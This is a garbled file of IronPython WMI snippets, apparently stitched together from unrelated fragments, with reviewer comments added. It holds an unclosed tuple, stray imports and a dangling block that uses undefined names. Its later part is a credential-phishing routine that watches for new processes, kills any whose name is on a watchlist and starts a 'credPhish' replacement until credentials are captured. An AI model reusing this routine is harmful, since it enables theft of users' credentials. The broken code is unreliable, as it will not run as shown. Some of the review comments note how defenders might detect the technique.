# Optional: run the remote WMI calls under an impersonation token instead of
# the default identity. Uncomment the three lines below to do so.
# from System.Management import AuthenticationLevel, ImpersonationLevel
# options.Impersonation = ImpersonationLevel.Impersonate
# options.Authentication = AuthenticationLevel.Default
# NOTE(review): AuthenticationLevel.Default leaves the DCOM packet protection
# level to negotiation; for a remote target, PacketPrivacy is presumably what
# you want so the event traffic is encrypted — confirm against the target's
# DCOM policy.

# Enable, for this connection, the token privileges the caller already holds.
# NOTE(review): broader than a read-only event subscription needs; presumably
# only required if the remote query touches privileged classes — verify.
options.EnablePrivileges = True
# Remote scope: FullComputerName is a placeholder for the target host;
# root\cimv2 is the namespace Win32_OperatingSystem lives in.
scope =  ManagementScope(r"\\FullComputerName\root\cimv2", options)

# Fire when the OS instance's FreePhysicalMemory drops below 10000 (the
# original note equates this to ~10 MB, i.e. the value is presumably in KB).
wql = ('TargetInstance ISA "Win32_OperatingSystem" AND '
       'TargetInstance.FreePhysicalMemory < 10000 ')

# Five-second TimeSpan passed with the query — presumably the WITHIN polling
# interval for the intrinsic __InstanceModificationEvent.
timeout = TimeSpan(0, 0, 5)
query = WqlEventQuery("__InstanceModificationEvent", timeout, wql)

# Bind query and remote scope to a watcher; Start() is not called in this
# snippet, the caller has to do that.
watcher = ManagementEventWatcher()
watcher.Query = query
watcher.Scope = scope
interesting_properties = (
    'FreePhysicalMemory',
    'FreeSpaceInPagingFiles',
    'FreeVirtualMemory',
    'NumberOfProcesses',
    'NumberOfUsers',
    'OSArchitecture',
    'ServicePackMajorVersion',
    'ServicePackMinorVersion',
    'SizeStoredInPagingFiles',
    'Status',
    'TotalVirtualMemorySize',
import clr
clr.AddReference('System.Management')
from System.Management import WqlEventQuery, ManagementEventWatcher

from System import TimeSpan
from System.Threading import Thread

# Watcher for process creation events on the local machine; WMI is asked for
# new Win32_Process instances with a one-second TimeSpan (presumably the
# query's WITHIN polling interval).
watcher = ManagementEventWatcher()

timeout = TimeSpan(0, 0, 1)
query = WqlEventQuery("__InstanceCreationEvent", timeout, 'TargetInstance isa "Win32_Process"')
watcher.Query = query

def arrived(sender, event):
    """EventArrived handler: dump every property of the newly created process.

    ``event.NewEvent`` is the ``__InstanceCreationEvent``; its
    ``TargetInstance`` is the new ``Win32_Process``, whose ``Properties`` are
    printed one per line as ``Name Value``. ``sender`` is unused.

    NOTE(review): the dump includes whatever the process exposes (its command
    line among other things), which can carry secrets passed as arguments —
    treat the output as sensitive if it is captured to a log.
    """
    print 'Event arrived'
    new_process = event.NewEvent['TargetInstance']
    for prop in new_process.Properties:
        print prop.Name, prop.Value

        
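# Hook the handler, start listening, and park the main thread.
watcher.EventArrived += arrived
watcher.Start()

print 'started'
try:
    # Nothing happens on this thread; it only has to stay alive so the
    # process (and with it the watcher's callbacks) keeps running.
    while True:
        Thread.CurrentThread.Join(1000)
finally:
    # Cancel the WMI event subscription explicitly (on Ctrl-C as well)
    # instead of leaving it to process teardown.
    watcher.Stop()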
    proc = e.NewEvent
    if proc['TargetInstance']['Name'] in WATCHLIST:
        Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
        print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
        cp = credPhish(proc)
        print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments)
        cp.NewProcess.Start()
        print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode)

def procWatch():
    """Block until a watched process is created, replace it, then stop.

    Loops on the module-level ``startWatch`` WMI watcher until the global
    ``GOT_CRED`` flag is set. For each ``Win32_Process`` creation whose
    ``Name`` is in the global ``WATCHLIST`` it kills the new process by PID,
    builds a replacement via ``credPhish`` and, if that object carries a
    ``NewProcess``, starts it and aborts the current thread. Any exception
    raised inside the loop ends it silently.

    NOTE(review): the bare ``except:`` swallows everything, including a
    KeyboardInterrupt raised while blocked in ``WaitForNextEvent()``, so the
    ``except KeyboardInterrupt`` around the top-level call never sees it and
    ``[*] Exiting.`` is not printed; ``except Exception:`` would let Ctrl-C
    through. ``Thread.GetCurrentThread().Abort()`` also raises inside this
    ``try`` — what the bare except does with the ThreadAbortException depends
    on IronPython's handling of it; verify the loop really terminates there.
    NOTE(review): defensively, the observable footprint is a WMI subscription
    on Win32_Process followed by a Process.Kill and an immediate new process
    start — presumably what detection logic for this technique keys on.
    """
    print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST))
    while GOT_CRED is False:
        try:
            # Synchronous pull; blocks until the next creation event arrives.
            proc = startWatch.WaitForNextEvent()
            if proc['TargetInstance']['Name'] in WATCHLIST:
                # The watched process is killed before credPhish is consulted,
                # so it is gone even when no replacement gets spawned below.
                Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
                print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
                
                cp = credPhish(proc)
                # credPhish may hand back an object without NewProcess; then
                # nothing is started and the loop simply waits for the next event.
                if hasattr(cp, "NewProcess"):
                    cp.NewProcess.Start()
                    print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments)
                    #Process.GetCurrentProcess.Kill()
                    # Ends this thread instead of the whole process (see the
                    # commented-out Kill above).
                    Thread.GetCurrentThread().Abort()
        except:
            # Silent exit on any error — see the docstring for what this hides.
            break
# Entry point: build the process-creation watcher and hand it to procWatch(),
# which pulls events with WaitForNextEvent() (no Start()/Stop() pair is used).
# NOTE(review): procWatch() ends its loop with a bare ``except: break``, so an
# interrupt raised inside it never reaches the handler below; ``[*] Exiting.``
# is only printed for a Ctrl-C that lands during watcher construction.
try:
    startWatch = ManagementEventWatcher(WqlEventQuery("__InstanceCreationEvent", TimeSpan(0,0,1), 'TargetInstance isa "Win32_Process"' ))
    procWatch()
except KeyboardInterrupt:
    print "[*] Exiting."